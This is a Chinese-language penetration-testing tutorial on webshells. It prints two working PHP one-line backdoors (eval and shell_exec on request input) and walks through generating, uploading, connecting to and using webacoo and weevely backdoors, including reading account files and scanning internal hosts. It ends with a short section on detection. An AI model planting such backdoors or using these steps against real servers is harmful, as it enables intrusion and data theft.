Webshell是通过服务器开放的端口获取服务器的某些权限。它又称脚本木马,一般分为大马、小马、一句话木马。
大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。
小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。
一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell。
Webshell正常肯定不是开发者想主动留下的,而且也比较少遇到现成的Webshell。多数情况下,我们使用的Webshell是利用文件上传漏洞、SQL注入漏洞、RCE漏洞等,将恶意文件放到web服务器中生成的。
这个生成的Webshell也就是常说的”后门”,之后通过这个Webshell可以进行文件管理、数据库管理、远程命令执行、提权等恶意操作。
这里介绍两种比较常见的一句话木马。
这是php语法的一句话木马:
<?php eval(@$_POST['value']);?>
<?php echo shell_exec($_GET['cmd']);?>
看一下第一种php的一句话木马:
php的第一种木马
具体语法用处就不解释了,感兴趣的可以查一下基础教程。等看到后面的WebShell管理工具的内容,你就会知道这种一句话木马其实都是可以通过工具生成的,没必要了解具体的语法。
这种木马使用也很方便,只要将需要执行的php代码,通过post形式的接口传入就行:
利用木马执行php代码
第二种木马:
第二种木马的使用方法:
利用木马执行命令
网上有挺多WebShell管理工具的,这些管理工具可以用来生成隐蔽性比较强的木马,并比较方便的连接木马进行渗透。这里简单罗列一些WebShell管理工具:
这些工具中有些是Windows环境的工具,有些是Linux环境的工具。看个人需要来选择要使用哪种工具吧。Cknife在以前业内挺有名,中文名叫中国菜刀,不是很确定还有没在更新。
你们在挑选使用的工具时,要确认一下是否还有维护,还有更新记录。去官网或者源头下载,别使用第三方定制过的,很容易中毒。
webacoo是Linux环境下的命令行工具,在Kali中安装的话直接输入webacoo就可以:
webacoo安装
在这里特意介绍webacoo,主要是因为它有这些优点:
先来看一下帮助文档:
webacoo -h
不对所有参数做介绍了,就用webacoo演示一遍渗透过程吧。
生成木马文件:
webacoo -g -o a.php
参数-g的作用是生成木马文件,这个参数需要和-o参数一起使用。
参数-o的作用是指定输出的文件名。
可以看到生成的木马文件内容是经过编码的:
生成的木马文件
将这个木马文件通过其他可以传输文件的漏洞传给目标服务器,这里利用文件上传漏洞:
将木马文件传给目标机器
在攻击机上连接目标主机:
连接目标主机
可以从左侧的文字看出,已经不在当前攻击机的Linux终端了。
其中的参数-t表示将webacoo作为客户端使用,-u表示要连接的服务器文件地址。
连接成功后已经能做很多操作了,比如提权、取证等:
渗透成功后的操作
用wireshark抓包看一下请求的执行:
请求的数据
可以看到请求的数据被携带在cookie中,且经过了默认的base64编码。
cm是base64编码的命令,cn是服务器用于返回数据的cookie头的名,cp是返回信息定界符。
可以通过对cm的内容进行解码,确认所传的命令是不是我们输入的:
对命令解码
webacoo还有一些比较实用的参数,比如不对木马进行混淆编译的-r、指定木马使用函数方法的-f、指定返回内容携带在cookie哪个名称中的-c、指定代理的-p等等。
weevely是预装在Kali中的,所以使用Kali的同学不用进行安装。它是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。
weevely有30多个管理模块,可以做到很多事情:
weevely还支持通过密码连接,这样就不容易出现自己好不容易渗透控制的肉鸡,第二天就被人摘了桃子的情况。
先看一下帮助文档:
weevely的帮助文档
下面演示一下渗透操作。生成木马文件:
生成的木马文件
将木马文件传给目标主机:
将木马文件传给目标机器
在攻击机上连接目标主机:
连接目标主机
在连接上目标主机后,可以通过输入help命令,查看前面提到的那些丰富的管理模块:
提供的管理模块
如果你在执行了help后没有管理模块显示,那可能是少装了一个python的三方库pysocks。直接通过pip应该会失败,可以去仓库下载源码包,手动安装,源码包地址:
https://pypi.python.org/pypi/PySocks/
将源码包放到攻击机后,到解压后的目录执行安装命令:
安装pysocks
安装成功后,就能正常使用weevely的管理模块了。
查找目标系统中的弱权限隐患:
audit_filesystem
查找账户文件:
audit_etcpasswd
这个其实自己通过命令也能很容易查找到,就是不知道weevely是直接查的固定文件,还是查了etc里面的所有文件。
用目标主机扫描内网其他主机:
扫描命令的使用说明
管理模块很多,这里就不全部演示了,感兴趣可以看帮助文档。
一般可以通过静态检测和动态检测来防止被webshell渗透。
静态检测主要是指对web日志的检查,进行文本特征匹配、统计特征计算与文件关联性分析,最后对检测结果汇总,列出疑似的Webshell文件。例如,网站目录下某php文件访问量很少,且来源ip固定。
动态检查主要是指监控webshell执行时刻表现出来的特征。例如,webshell如果执行系统命令的话,会有进程,我们只要实时监控可疑进程就行。
作为攻击者,要进行webshell渗透,主要是考虑如何绕过系统上传webshell,如何隐藏webshell免查杀;作为防御者,为了安全,应该考虑如何避免webshell被上传,如何查杀webshell。
留言与评论(共有 0 条评论) “” |